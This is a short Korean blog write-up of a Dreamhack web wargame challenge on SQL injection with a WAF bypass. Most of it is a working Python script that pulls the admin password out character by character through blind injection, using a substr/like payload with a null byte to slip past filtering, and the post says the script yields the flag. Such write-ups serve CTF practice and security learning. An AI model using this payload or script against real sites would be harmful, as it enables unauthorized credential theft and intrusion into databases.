모의해킹/Dreamhack

sql injection bypass WAF Advanced [WEB LEVEL1]

철민1234 2023. 4. 18. 13:29
728x90

문제 정보
문제 정보

저번에 풀었던 SQL injection bypass WAF 문제랑 동일하다.

소스 코드

다른 점은 더 많은 문자열이 필터링되어 있다. 

 

import requests
from string import ascii_letters, digits

a = ascii_letters + digits

url = "http://host3.dreamhack.games:13684/"
num = 0
ch =''
while True:
    num += 1
    for i in a:
        param = {"uid":"'||substr(upw,"+str(num)+",1)like('"+str(i)+"');%00"}
        req = requests.get(url,params=param)
        if "admin" in req.text:
            ch += i
            print(ch)
            break

저번에 작성한 쿼리문이 그대로 여기서도 실행이 되어 만들어놓은 페이로드를 실행시키면 flag 값을 받을 수 있다.